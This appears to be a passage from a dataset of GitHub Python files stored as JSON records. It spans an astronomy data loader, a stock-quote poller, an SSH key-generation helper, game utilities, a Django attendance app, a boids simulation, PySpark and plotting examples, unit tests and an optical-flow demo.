RuntimeError(\"Inconsistent sampling\")\n spectra[idx] = trans\n params[idx]['airmass'] = airmass\n params[idx]['pwv_mm'] = pwv\n\n hdul = fits.HDUList([\n fits.PrimaryHDU(),\n fits.BinTableHDU(params, name='PARAMS'),\n fits.ImageHDU((wavelengths_um * u.um).to(WAVELENGTH_UNITS).value, name='WAVELENGTHS'),\n fits.ImageHDU(spectra, name='MODEL_SPECTRA'),\n ])\n hdul.writeto(output_filepath, overwrite=True)\n\nMANQUI_ATMOSPHERES_DATA = utils.REMOTE_RESOURCES.add_from_url(\n module=__name__,\n url='https://magao-x.org/docs/handbook/_static/ref/atm/magaox_manqui_atm.zip',\n converter_function=_convert_manqui_atmospheres,\n output_filename='magaox_cerro_manqui_atmosphere_grid.fits',\n)\nMANQUI_ATMOSPHERES_FITS = MANQUI_ATMOSPHERES_DATA.output_filepath\nMANQUI_ATMOSPHERES = model_grids.ModelAtmosphereGrid(MANQUI_ATMOSPHERES_FITS, name=\"LCO Cerro Manqui\")\n","repo_name":"joseph-long/doodads","sub_path":"doodads/ref/magellan_atmospheres.py","file_name":"magellan_atmospheres.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12086676030","text":"import requests\nimport re\nimport time\nimport sys\nfrom datetime import datetime\n\ndef get_Price(var1):\n match = re.search(\"\", var1)\n if not match:\n \treturn \"Error\"\n match2 = re.search(\"\", var1)\n if not match2:\n \treturn \"Error\"\n return match.string[match.end():match2.start()]\n\ndef get_Volume(var1):\n\tmatch = re.search(\"\", var1)\n\tif not match:\n\t return \"Error\"\n\tmatch2 = re.search(\"\", var1)\n\tif not match2:\n\t return \"Error\"\n\treturn match.string[match.end():match2.start()]\n\ndef get_Cap(var1):\n\tmatch = re.search(\"\", var1)\n\tif not match:\n\t return \"Error\"\n\tmatch2 = re.search(\"\", var1)\n\tif not match2:\n\t return \"Error\"\n\treturn match.string[match.end():match2.start()]\n\ndef get_Time(var1):\n match = re.search(\"\", var1)\n if not match:\n \treturn \"Error\"\n match2 = re.search(\"\", var1)\n if not match2:\n \treturn \"Error\"\n unprocessed = match.string[match.end():match2.start()]\n processed = process_Time(unprocessed)\n return processed\n\ndef process_Time(var1):\n to_Return = \"\"\n months = {}\n months[\"Jan\"] = \"1\"\n months[\"Feb\"] = \"2\"\n months[\"Mar\"] = \"3\"\n months[\"Apr\"] = \"4\"\n months[\"May\"] = \"5\"\n months[\"Jun\"] = \"6\"\n months[\"Jul\"] = \"7\"\n months[\"Aug\"] = \"8\"\n months[\"Sep\"] = \"9\"\n months[\"Oct\"] = \"10\"\n months[\"Nov\"] = \"11\"\n months[\"Dec\"] = \"12\"\n\n split = re.split(\" \", var1)\n to_Return = to_Return + split[5] + \"-\"\n to_Return = to_Return + months[split[1]] + \"-\" + split[2]\n to_Return = to_Return + \" \" + split[3]\n return to_Return\n\ndef check_Time(times):\n split = re.split(\" \", times)\n times = split[1]\n split = re.split(\":\", times)\n if split[0] == \"15\" and split[1] == \"59\" and split[2] == \"59\":\n return 0\n else: return 1\n\n\n\ntickers = {}\n\ntickers[5] = \"CKEC\" #**\ntickers[6] = \"SRPT\"\ntickers[7] = \"TK\"\ntickers[8] = \"HRG\" #***\ntickers[9] = \"CJES\"\ntickers[10] = \"CIT\"\ntickers[11] = \"TUP\" #***\ntickers[12] = \"BC\" #***\ntickers[13] = \"FITB\"\ntickers[14] = \"LNC\"\ntickers[15] = \"LUK\"\ntickers[16] = \"TRCO\"\ntickers[17] = \"DOX\" #***\ntickers[18] = \"PDLI\"\ntickers[19] = \"XL\"\ntickers[20] = \"CSCO\"\ntickers[21] = \"DIS\"\ntickers[22] = \"DVN\"\ntickers[23] = \"HD\"\ntickers[24] = \"JPM\"\ntickers[25] = \"PFE\"\ntickers[26] = \"S\"\ntickers[27] = \"V\"\ntickers[28] = \"WMT\"\ntickers[29] = \"XOM\"\n\n\n#total_data = {}\n\n#j = 0\n#while j < 30:\n#\tpd_pairs = {}\n#\tprices = []\n#\tdates = []\n#\tpd_pairs = {'Prices' : prices, 'Dates' : dates}\n#\ttotal_data[tickers[j]] = pd_pairs\n#\tj += 1\n\n\nwhile True:\n i = 5\n while i < 30: \n url = 'http://dev.markitondemand.com/Api/v2/Quote/xml'\n data = {}\n data['Content-Length'] = 25\n data['symbol'] = tickers[i]\n r = requests.get(url, params = data)\n output = r.text\n \n # pairs = total_data[tickers[i]]\n # price = pairs['Prices']\n # times = pairs['Dates']\n\n times = get_Time(output)\n check = check_Time(times)\n if check == 0:\n time.sleep(63000)\n continue\n print(tickers[i] + \", \", end=\"\")\n print(times + \", \", end=\"\")\n sys.stdout.flush()\n\n print(get_Price(output) + \", \", end=\"\")\n sys.stdout.flush()\n\n print(get_Cap(output) + \", \", end=\"\")\n sys.stdout.flush()\n\n print(get_Volume(output), end=\"\")\n sys.stdout.flush()\n\n if not i == 29:\n print(\", \", end=\"\")\n sys.stdout.flush()\n # price.append(get_Price(output))\n # times.append(get_Time(output))\n # pairs['Prices'] = price\n # pairs['Dates'] = times\n # total_data[tickers[i]] = pairs\n # print(total_data[tickers[i]])\n i += 1\n time.sleep(12) ### change back to 10\n print()\n\t\n\n\n\n\n#print(match.group(0))\n\n\n\n","repo_name":"jhm4/jhm4.github.io","sub_path":"rQuote.py","file_name":"rQuote.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4551821938","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import datetime\nimport shutil\n##Utils copy, etc.\n\ndt = datetime.now()\ncur_date = dt.strftime(\"%A, %d %B %Y %I:%M%p\\n\")\n\nfilersa = 'remote_rsa'\nuser_ssh_dir = '/home/oracle/.ssh'\ncur_dir = '/tmp'\nresult_good_file = 'TestGood'\nresult_bad_file = 'TestBad'\nlog_file = 'steps.log'\n\nprint('Current date: ' + cur_date)\n\ndef writeToFile(file='',str=''):\n os.chdir(cur_dir)\n fd = open(file,'a')\n fd.write(str)\n fd.close()\n\ndef touch(path=''):\n with open(path,'a'):\n os.utime(path,None)\n ##os.close(path)\n\ndef checkCreateRSA(file,path):\n \"\"\"Check exist file RSA. If not exists - Create \"\"\"\n cmd = 'ssh-keygen -t rsa -b 4096 -N \\'\\' -f' + path + '/' + file\n\n os.chdir(path)\n if os.path.isfile(file):\n return True\n else:\n result = os.system(cmd)\n if result == 0:\n return True\n else:\n return False\n\nif not os.path.isfile(log_file):\n touch(log_file)\nelse:\n writeToFile(log_file,cur_date)\n\nif checkCreateRSA(filersa,user_ssh_dir):\n writeToFile(log_file,'')","repo_name":"vaxabitus/mypythonkoans","sub_path":"koans/temp/sshd.py","file_name":"sshd.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35219705023","text":"# Seth Squires\n# 11/21\n# Common Game Functions\n\n\n# askYesOrNo\ndef askYesOrNo(question):\n \"\"\"asks a yes or no question to the user and returns the answer if it is yes or no\"\"\"\n while True:\n answer = input(question)\n\n if (\"y\" in answer.lower() and \"n\" in answer.lower()):\n print(\"\\nThat answer was too complicated for me. Try again. \\n\")\n continue\n elif (\"y\" in answer.lower()):\n answer = \"Yes\"\n return answer\n elif (\"n\" in answer.lower()):\n answer = \"No\"\n return answer\n else:\n print(\"\\nInvalid response. Try again.\\n\")\n\n# flip coin, roll dice\ndef flipCoin():\n import random\n \"\"\"picks a random value and returns heads or tails\"\"\"\n side = random.randint(0, 1)\n if side == 0:\n side = \"Heads\"\n return side\n elif side == 1:\n side = \"Tails\"\n return side\n\ndef rollDice(high):\n import random\n \"\"\"takes in the number of sides and picks a random number\"\"\"\n side = random.randint(1, high)\n return side\n\n# getNumInRange\ndef getNumInRange(low, high, question):\n \"\"\"\"takes in a minimum, maximum and question. Asks the user the question, then gets the answer and returns it.\"\"\"\n while True:\n number = input(question)\n try:\n number = int(number)\n if number >= low:\n if number <= high:\n return number\n\n else:\n print(\"Too high, try again.\\n\")\n else:\n print(\"Too low, try again.\\n\")\n except:\n print(\"Invalid input, try again.\\n\")\n\n# Make a menu and return an input\ndef menu(text, options):\n \"\"\"takes in a list of options and asks the player which they would like to do.\"\"\"\n print(text)\n while True:\n for i in range(len(options)):\n print(str(i+1)+\" \"+options[i])\n answer = input(\"What would you like to do? \")\n try:\n answer = int(answer)\n if answer <= len(options) and answer > 0:\n return answer-1\n else:\n input(\"Invalid input, press enter to try again.\\n\")\n\n\n except:\n input(\"Invalid input, press enter try again.\\n\")\n\ndef getName():\n \"\"\"asks the user for their name and returns it.\"\"\"\n while True:\n name = input(\"What's your name?\")\n if name.isalpha() and len(name)>0:\n name.capitalize()\n return name\n else:\n input(\"Invalid input, press enter to try again.\")\n\ndef shuffleDeck(deck):\n \"\"\"takes a deck and shuffles it.\"\"\"\n import random\n random.shuffle(deck)\n return deck\n\ndef dealCard(deck):\n \"\"\"takes in a deck and gives the top part of that deck\"\"\"\n card = deck.pop(0)\n return card\n\ndef randomCard(deck):\n \"\"\"takes in a deck and gives a random card from that deck\"\"\"\n import random\n card = deck.pop(random.randint(0,len(deck)-1))\n return card\n\nif __name__ == \"__main__\":\n print(\"This is not a program. Try importing and using the classes.\")\n input(\"\\n\\nPress the enter key to exit.\")\n","repo_name":"Sdsquires27/Seth-S-Programming-Portfolio","sub_path":"Chucklehead - Graphical (Python)/commonGameFunctions.py","file_name":"commonGameFunctions.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21981467122","text":"from concurrent.futures import ThreadPoolExecutor, as_completed\nimport threading\nimport time\nfrom datetime import datetime\n\n'''\nSuitable for parallel executing IO intensive tasks\n'''\n\n\ndef worker(params):\n output = []\n for i in params:\n print(datetime.now(), threading.get_ident())\n output.append(i * 2)\n time.sleep(1)\n return output\n\n\npool = ThreadPoolExecutor(max_workers=10)\ntasks = list(range(1, 300))\ntask_size = len(tasks)\nbatch_size = 30\nfutures = []\nfor i in range(0, task_size, batch_size):\n print(i, min(i+batch_size, task_size))\n batch = tasks[i:min(i+batch_size, task_size)]\n futures.append(pool.submit(worker, batch))\n\npool.shutdown(wait=True)\nresult = []\nfor future in as_completed(futures):\n items = future.result()\n result.extend(items)\nprint(result)\n","repo_name":"shushanxingzhe/python_learning","sub_path":"accelerate/multi_threading.py","file_name":"multi_threading.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11498685066","text":"from atexit import register\nfrom datetime import datetime\nfrom urllib import request\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .serializers import *\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\n\n\n# Create your views here.\ndef index(request):\n data = Student.objects.all().order_by('-id')\n context = {'datas': data}\n return render(request,'index.html', context)\n\n\ndef student_attendance(request):\n data = Attendance.objects.all().order_by('-id')\n context = {'datas': data, 'name':'All attandance'}\n return render(request, 'attendance.html', context)\n\n\ndef student_reg(request):\n return render(request,'student_registration.html')\n\ndef student_perf(request):\n return render(request,'student_performance.html')\n\ndef teacher_reg(request):\n return render(request,'teacher_registertion.html')\n\ndef teacher_perf(request):\n return render(request,'teacher_perf.html')\n\n\n@api_view(['POST'])\ndef insert_attendance_post(request):\n print(request.data)\n card = str(request.data['card'].replace(' ', ''))\n alcohol = int(request.data['alcohol'])\n identifier = request.data['identifier']\n user = '- No student found'\n attend_status = \"\" # by default attandance is okay\n\n if alcohol >= 30:\n attend_status = \"drunk\" # he is drunk\n try:\n get_student = Student.objects.get(card_id=card)\n get_student_class = get_student.class_name\n try:\n get_identifier_class = OurClass.objects.get(identifier=identifier)\n except:\n attend_status = \"class not found\" #invalid class identifier\n return Response(attend_status, status=status.HTTP_304_NOT_MODIFIED)\n\n if get_identifier_class != get_student_class:\n attend_status = \"not our student\" # not belong to this class\n return Response(attend_status)\n insert_data = Attendance()\n insert_data.student = get_student\n insert_data.class_attend = get_identifier_class\n insert_data.alcohol_level = alcohol\n insert_data.save()\n user = get_student.fullname\n except:\n attend_status = \"student card not found\" # student not found\n return HttpResponse(f'{attend_status}{user}', status=status.HTTP_200_OK)\n\n\n# http://127.0.0.1/api/idatechiot/card1002alcohol8/\n@api_view(['GET'])\ndef insert_attendance_get(request, identifier, card, alcohol):\n attend_status = \"\" # by default attandance is okay\n user = 'No student found'\n if alcohol >= 30:\n attend_status = \"drunk\" # he is drunk\n try:\n get_student = Student.objects.get(card_id=card)\n get_student_class = get_student.class_name\n try:\n get_identifier_class = OurClass.objects.get(identifier=identifier)\n except:\n attend_status = \"class not found\" #invalid class identifier\n return Response(attend_status)\n\n if get_identifier_class != get_student_class:\n attend_status = \"not our student\" # not belong to this class\n return Response(attend_status)\n insert_data = Attendance()\n insert_data.student = get_student\n insert_data.class_attend = get_identifier_class\n insert_data.alcohol_level = alcohol\n insert_data.save()\n user = get_student.fullname\n except:\n attend_status = \"student card not found \" # student was not found\n return HttpResponse(f'{attend_status} {user}', status=status.HTTP_200_OK)\n\n\ndef register_student(request):\n form = CreateUserForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('../')\n\n context = {'form': form}\n return render(request, 'signup.html', context)\n\n# datetime.today().date()\n\ndef today_attendance(request):\n today = datetime.today()\n year = today.year\n month = today.month\n day = today.day\n data = Attendance.objects.filter(arrive_time__year=year,\n arrive_time__month=month, arrive_time__day=day).order_by('-id')\n context = {'datas': data, 'name':'TODAY ATTANDANCE'}\n return render(request, 'attendance.html', context)\n\n\ndef view_selected_attendance(request, myid):\n get_student = Student.objects.get(id=myid)\n data = Attendance.objects.filter(student=get_student).order_by('-id')\n context = {'datas': data, 'name':'SELECTED STUDENT ATTANDENCE'}\n return render(request, 'attendance.html', context)\n\n\ndef test(request):\n pass\n","repo_name":"zaincode21/Class-Monitoring-with-camera-and-RFID","sub_path":"indexapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19026504806","text":"import random\nclass Boid:\n\n\n def __init__(self,*args):\n '''\n\n :param args: tuple of arguments in the form (x position, y position, x velocity, y velocity)\n '''\n #boundries that the boids position and velocity must be between\n self._x_pos_boundaries = {'low':-450,'high':50.0}\n self._y_pos_boundaries = {'low':300.0,'high':600.0}\n self._x_vel_boundaries = {'low':0,'high':10.0}\n self._y_vel_boundaries = {'low':-20.0,'high':20.0}\n\n if len(args)==0:\n #initialising boids position and velocity\n self._x_pos=random.uniform(self._x_pos_boundaries['low'],self._x_pos_boundaries['high'])\n self._y_pos=random.uniform(self._y_pos_boundaries['low'],self._y_pos_boundaries['high'])\n self._x_vel=random.uniform(self._x_vel_boundaries['low'],self._x_vel_boundaries['high'])\n self._y_vel=random.uniform(self._y_vel_boundaries['low'],self._y_vel_boundaries['high'])\n else:\n #user defined position of boid\n try:\n x_position,y_position,x_velocity,y_velocity=args\n except ValueError:\n raise ValueError('args expected to be of length 4')\n x_pos_outside_boundary = x_positionself._x_pos_boundaries['high']\n y_pos_outside_boundary = y_positionself._y_pos_boundaries['high']\n x_vel_outside_boundary = x_velocityself._x_vel_boundaries['high']\n y_vel_outside_boundary = y_velocityself._y_vel_boundaries['high']\n if x_pos_outside_boundary:\n raise ValueError('x postion coordinate outside boundary')\n elif y_pos_outside_boundary:\n raise ValueError('y position coordinate outside boundary')\n elif x_vel_outside_boundary:\n raise ValueError('x velocity coordinate outside boundary')\n elif y_vel_outside_boundary:\n raise ValueError('y velocity coordinate outside boundary')\n else:\n self._x_pos=x_position\n self._y_pos=y_position\n self._x_vel=x_velocity\n self._y_vel=y_velocity\n\n\n def getPosition(self):\n '''\n getter for position\n :return: dictionary of boid position cartesian coordinates\n '''\n return{\n 'x':self._x_pos,\n 'y':self._y_pos\n }\n def getVelocity(self):\n '''\n getter for velocity\n :return: dictionary of boid velocity in cartesian coordinates\n '''\n return {\n 'x':self._x_vel,\n 'y':self._y_vel\n }\n\n def setPosition(self,x,y):\n '''\n set the position of a boid in 2D cartesian space\n :param x: x position\n :param y: y position\n '''\n\n x_outside_boundary = xself._x_pos_boundaries['high']\n y_outside_boundary = yself._y_pos_boundaries['high']\n #if x_outside_boundary:\n # raise ValueError('x position coordinate outside boundary')\n #elif y_outside_boundary:\n # raise ValueError('y position coordinate outside boundary')\n #else:\n self._x_pos=x\n self._y_pos=y\n\n def setVelocity(self,x,y):\n '''\n set the velocity of a boid in 2D cartesian space\n :param x: x position\n :param y: y position\n '''\n x_outside_boundary = xself._x_vel_boundaries['high']\n y_outside_boundary = yself._y_vel_boundaries['high']\n #if x_outside_boundary:\n # raise ValueError('x velocity coordinate outside boundary')\n #elif y_outside_boundary:\n # raise ValueError('y velocity coordinate outside boundary')\n #else:\n self._x_vel=x\n self._y_vel=y\n\n def towardsMiddle(self,boid,num_boids):\n '''\n Update velocity so that the boid boid flies towards the middle of the flock\n :param boid: another boid object\n :param num_boids: number of boids in the flock\n '''\n boid_pos=boid.getPosition()\n new_x_vel=self._x_vel+(boid_pos['x']-self._x_pos)*0.01/num_boids\n new_y_vel=self._y_vel+(boid_pos['y']-self._y_pos)*0.01/num_boids\n self.setVelocity(new_x_vel,new_y_vel)\n\n\n def awayFromNeighbour(self,boid):\n '''\n If another boid is close then fly away from it\n :param boid: another boid object\n '''\n boid_pos=boid.getPosition()\n is_neighbour=((boid_pos['x']-self._x_pos)**2 + (boid_pos['y']-self._y_pos)**2) < 100\n if is_neighbour:\n new_x_vel=self._x_vel+(self._x_pos-boid_pos['x'])\n new_y_vel=self._y_vel+(self._y_pos-boid_pos['y'])\n self.setVelocity(new_x_vel,new_y_vel)\n\n def matchSpeedOfNeighbour(self,boid,num_boids):\n '''\n If a boid is close(ish) then try then make velocity similar to the boid's\n :param boid: another boid object\n :param num_boids: number of boids in the flock\n '''\n boid_pos=boid.getPosition()\n boid_vel=boid.getVelocity()\n is_neighbour=((boid_pos['x']-self._x_pos)**2 + (boid_pos['y']-self._y_pos)**2) < 10000\n if is_neighbour:\n new_x_vel=self._x_vel+(boid_vel['x']-self._x_vel)*0.125/num_boids\n new_y_vel=self._y_vel+(boid_vel['y']-self._y_vel)*0.125/num_boids\n self.setVelocity(new_x_vel,new_y_vel)\n\n def move(self):\n '''\n update position based on the velocity\n '''\n new_x_pos=self._x_pos+self._x_vel\n new_y_pos=self._y_pos+self._y_vel\n self.setPosition(new_x_pos,new_y_pos)","repo_name":"samstern/Boids","sub_path":"Boids/boid.py","file_name":"boid.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22952549131","text":"import plotly.express as px\n\nfrom random_walk import RandomWalk\n\n\n# Make a random walk.\nrw = RandomWalk(50_000)\nrw.fill_walk()\n\n# Plot the points in the walk.\ndf = px.data.iris()\nnum_of_plots = range(50000)\nfig = px.scatter(df, x=rw.x_values, y=rw.y_values, color=num_of_plots)\nfig.show()\n\n","repo_name":"lucasfsf/data_visualization","sub_path":"rw_visual_plotly.py","file_name":"rw_visual_plotly.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21554962241","text":"import main\nimport unittest\nimport sqlite3\nimport requests\nfrom unittest import mock\nfrom unittest.mock import patch\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napi_key = os.getenv('MY_API_KEY')\n\ndb_path = './app_data/dbase.db'\n\nmy_api_key = api_key\n\nclass userTests(unittest.TestCase):\n\n test_telegram_id = 999999999999999999\n test_telegram_id_for_creation = 999999999999999991\n\n def setUp(self):#здесь он что-то создал\n conn = sqlite3.connect(db_path)\n cursor = conn.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS users (telegram_id INTEGER PRIMARY KEY)')\n cursor.execute('INSERT INTO users (telegram_id) VALUES (?)', (self.test_telegram_id,))\n conn.commit()\n conn.close()\n \n def tearDown(self):\n conn = sqlite3.connect(db_path)\n cursor = conn.cursor()\n cursor.execute('DELETE FROM users WHERE telegram_id = ?', (self.test_telegram_id,))\n cursor.execute('DELETE FROM users WHERE telegram_id = ?', (self.test_telegram_id_for_creation,))\n conn.commit()\n conn.close()\n\n def testCheckUserExistance(self):#здесь проверил существование того, что создал\n user = main.User(self.test_telegram_id)\n result = user.checkUserRecord()\n self.assertEqual(result, self.test_telegram_id)\n\n def testCreateUser(self):#здесь он создал нового пользователя и проверил, что он есть в базе\n user = main.User(self.test_telegram_id_for_creation)\n result_creation = user.createUserRecord()\n result_check = user.checkUserRecord()\n self.assertEqual(result_check, self.test_telegram_id_for_creation)\n\nclass currencyTests(unittest.TestCase):\n \n test_cur_id_1 = \"USD\"\n test_cur_id_2 = \"EUR\"\n ret_value = {\n \"Realtime Currency Exchange Rate\": {\n \"1. From_Currency Code\": \"USD\",\n \"2. From_Currency Name\": \"United States Dollar\",\n \"3. To_Currency Code\": \"EUR\",\n \"4. To_Currency Name\": \"Euro\",\n \"5. Exchange Rate\": \"0.93910000\",\n \"6. Last Refreshed\": \"2023-09-25 05:40:02\",\n \"7. Time Zone\": \"UTC\",\n \"8. Bid Price\": \"0.93908000\",\n \"9. Ask Price\": \"0.93913000\"\n }}\n\n def testCheckCurrencyExistance(self):\n\n with mock.patch('requests.get') as mock_get:\n \n mock_response_success = mock.Mock()\n mock_response_success.status_code = 200\n mock_response_success.json.return_value = self.ret_value\n\n mock_response_error= mock.Mock()\n mock_response_error.status_code = 404\n mock_response_error.json.return_value = None\n\n mock_get.return_value = mock_response_success\n result_success = main.curTocur(self.test_cur_id_1, self.test_cur_id_2)\n self.assertTrue(result_success, mock_get.return_value)\n\n mock_get.return_value = mock_response_error\n result_error = main.curTocur(self.test_cur_id_1, self.test_cur_id_2)\n self.assertFalse(result_error, mock_get.return_value)\n\n\nclass CurrencyTests(unittest.TestCase):\n \n test_cur_id = \"USD\"\n test_date = \"23/09/2023\"\n ret_value = \"\"\"\n \n \n 840\n USD\n 1\n Доллар США\n 96,0419\n \n \n\"\"\"\n\n def testCheckCurrencyExistance(self):\n\n with mock.patch('requests.get') as mock_get:\n mock_response_success = mock.Mock()\n mock_response_success.status_code = 200\n mock_response_success.text = self.ret_value\n\n mock_response_error= mock.Mock()\n mock_response_error.status_code = 404\n mock_response_error.text = None\n\n mock_get.return_value = mock_response_success\n result = main.checkCurrency(self.test_date, self.test_cur_id)\n self.assertEqual(result, 96.04)\n\n mock_get.return_value = mock_response_error\n result_error = main.curTocur(self.test_date, self.test_cur_id)\n self.assertFalse(result_error, mock_get.return_value)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"petranam/lesson_2","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43723529308","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 2 20:51:59 2018\r\n\r\n@author: Paul\r\n\"\"\"\r\ndict1={\"林小明\":85,\"黃明晶\":71,\"曾山水\":93}\r\ndict1.setdefault(\"陳莉莉\",98)\r\ndict1.setdefault(\"鄭美麗\",67)\r\nnameandscore=list(dict1.items())\r\nfor i in range(0,5):\r\n print(\"%s 的成績為:%d分\"%(nameandscore[i][0],nameandscore[i][1]))\r\n i+=1\r\n#林小明 黃明晶 曾山水 陳莉莉 鄭美麗\r\n#85 71 93 98 67","repo_name":"paul33931029/python-beginner","sub_path":"我做的程式/ch03/顯示字典內容(二).py","file_name":"顯示字典內容(二).py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6263525600","text":"\"\"\"empty message\n\nRevision ID: 8c4cf25f4e2b\nRevises: d09178809d5e\nCreate Date: 2018-08-27 11:43:08.721111\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"8c4cf25f4e2b\"\ndown_revision = \"d09178809d5e\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"category\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"title\", sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_category_title\"), \"category\", [\"title\"], unique=True)\n op.add_column(\"post\", sa.Column(\"category_id\", sa.Integer(), nullable=True))\n op.create_foreign_key(None, \"post\", \"category\", [\"category_id\"], [\"id\"])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"post\", type_=\"foreignkey\")\n op.drop_column(\"post\", \"category_id\")\n op.drop_index(op.f(\"ix_category_title\"), table_name=\"category\")\n op.drop_table(\"category\")\n # ### end Alembic commands ###\n","repo_name":"Stormy9/CS407MA_Fall-18","sub_path":"wolfit-Stormy9/migrations/versions/8c4cf25f4e2b_add_categories.py","file_name":"8c4cf25f4e2b_add_categories.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5211670870","text":"\"\"\"\nThis script matches MostPopularSuperheroDataset.scala.\n\"\"\"\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, IntegerType, StringType\nfrom pyspark.sql.functions import split, col, sum, size\n\n\ndef main() -> None:\n spark = SparkSession.builder.appName(\"MostPopularSuperheroDataFrame\").master(\"local[*]\").getOrCreate()\n\n superhero_names_schema = StructType()\n superhero_names_schema.add(\"id\", IntegerType(), True)\n superhero_names_schema.add(\"name\", StringType(), True)\n names = spark.read.format(\"csv\").schema(superhero_names_schema).option(\"sep\", \" \").load(\"./data/marvel-names.txt\")\n\n lines = spark.read.text(\"./data/marvel-graph.txt\")\n connections = lines.withColumn(\"id\", split(col(\"value\"), pattern=\" \")[0]) \\\n .withColumn(\"connections\", size(split(col(\"value\"), pattern=\" \")) - 1) \\\n .groupby(\"id\").agg(sum(\"connections\").alias(\"connections\"))\n\n most_popular = connections.sort(col(\"connections\").desc()).first()\n most_popular_name = names.filter(col(\"id\") == most_popular[0]).select(\"name\").first()\n print(f\"{most_popular_name[0]} is the most popular superhero with {most_popular[1]} co-appearances.\")\n\n spark.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tomer0013/pyspark-examples","sub_path":"MostPopularSuperheroDataFrame.py","file_name":"MostPopularSuperheroDataFrame.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10169948809","text":"from random import choices\n\n\ndef fruit():\n fruits = [\"apple\", \"banana\", \"cherry\", \"durian\"]\n return choices(fruits)[0]\n\n\ndef meal(beverage):\n my_fruit = fruit()\n print(f\"My fruit is {my_fruit}\")\n if my_fruit == \"cherry\":\n complete_meal = f\"Your meal is a {my_fruit} and {beverage}\"\n return complete_meal\n return f\"Your meal is a steak and {beverage}\"\n\n\nif __name__ == \"__main__\":\n print(fruit())\n","repo_name":"richardvlas/python-for-devops-june-2023","sub_path":"devopslib/randomfruit.py","file_name":"randomfruit.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33831842655","text":"import numpy as np\nimport torch\nimport cv2\n\nfrom unimatch.unimatch import UniMatch\nfrom utils.flow_viz import flow_to_image\n\nmodel = UniMatch(feature_channels=128,\n num_scales=1,\n upsample_factor=8,\n ffn_dim_expansion=4,\n num_transformer_layers=6,\n reg_refine=False,\n task='flow')\n\nmodel.eval()\n# checkpoint_path = 'pretrained/gmflow-scale2-regrefine6-mixdata-train320x576-4e7b215d.pth'\ncheckpoint_path = './pretrained/gmflow-scale1-mixdata-train320x576-4c3a6e9a.pth'\ncheckpoint_flow = torch.load(checkpoint_path)\nmodel.load_state_dict(checkpoint_flow['model'], strict=True)\nattn_type = 'swin'\nattn_splits_list = [2]\ncorr_radius_list = [-1]\nprop_radius_list = [-1]\nnum_reg_refine = 1\n\ncap = cv2.VideoCapture('demo/test.mkv')\nprev = None\n\nwith torch.no_grad():\n while cap.isOpened():\n ret, img = cap.read()\n if not ret: break\n height, width = img.shape[:2]\n imgL = img[:, :int(width/2)]\n imgL = cv2.resize(imgL, (384, 384))\n if prev is None:\n prev = imgL\n continue\n\n image1 = np.array(prev).astype(np.float32)\n image2 = np.array(imgL).astype(np.float32)\n\n image1 = torch.from_numpy(image1).permute(2, 0, 1).float().unsqueeze(0)\n image2 = torch.from_numpy(image2).permute(2, 0, 1).float().unsqueeze(0)\n\n results_dict = model(image1, image2,\n attn_type=attn_type,\n attn_splits_list=attn_splits_list,\n corr_radius_list=corr_radius_list,\n prop_radius_list=prop_radius_list,\n num_reg_refine=num_reg_refine,\n task='flow',\n )\n\n flow_pr = results_dict['flow_preds'][-1] # [1, 2, H, W] or [1, H, W]\n flow = flow_pr[0].permute(1, 2, 0).cpu().numpy() # [H, W, 2]\n\n u = flow[:, :, 0]\n v = flow[:, :, 1]\n rad = np.sqrt(u ** 2 + v ** 2)\n a 